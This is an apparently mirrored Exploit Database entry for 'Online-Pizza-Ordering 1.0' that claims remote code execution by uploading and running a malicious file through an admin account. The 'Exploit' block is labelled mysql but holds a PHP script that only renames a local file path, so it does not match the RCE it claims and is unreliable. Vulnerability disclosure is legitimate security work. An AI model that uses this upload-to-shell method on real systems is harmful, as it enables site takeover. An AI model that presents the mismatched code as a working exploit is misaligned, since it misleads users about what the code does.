Online-Pizza-Ordering -1.0 – Remote Code Execution (RCE)

• Exploit Database
• 21 阅读

• 作者： nu11secur1ty
  日期： 2023-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51344/

• ## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
  ## Author: nu11secur1ty
  ## Date: 03.30.2023
  ## Vendor: https://github.com/oretnom23
  ## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
  ## Reference: https://portswigger.net/web-security/file-upload
  
  ## Description:
  The malicious user can request an account from the administrator of
  this system.
  Then he can use this vulnerability to destroy or get access to all
  accounts of this system, even more, worst than ever.
  The malicious user can upload a very dangerous file on this server,
  and he can execute it via shell,
  this is because he can access the upload function from the
  administrator account.
  The status is CRITICAL.
  
  STATUS: HIGH Vulnerability
  
  [+]Exploit:
  ```mysql
  <?php
  // by nu11secur1ty - 2023
  // Old Name Of The file
  $old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
  
  // New Name For The File
  $new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
  
  // using rename() function to rename the file
  rename( $old_name, $new_name) ;
  
  ?>
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
  
  ## Proof and Exploit:
  [href](https://streamable.com/szb9qy)
  
  ## Time spend:
  00:45:00
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>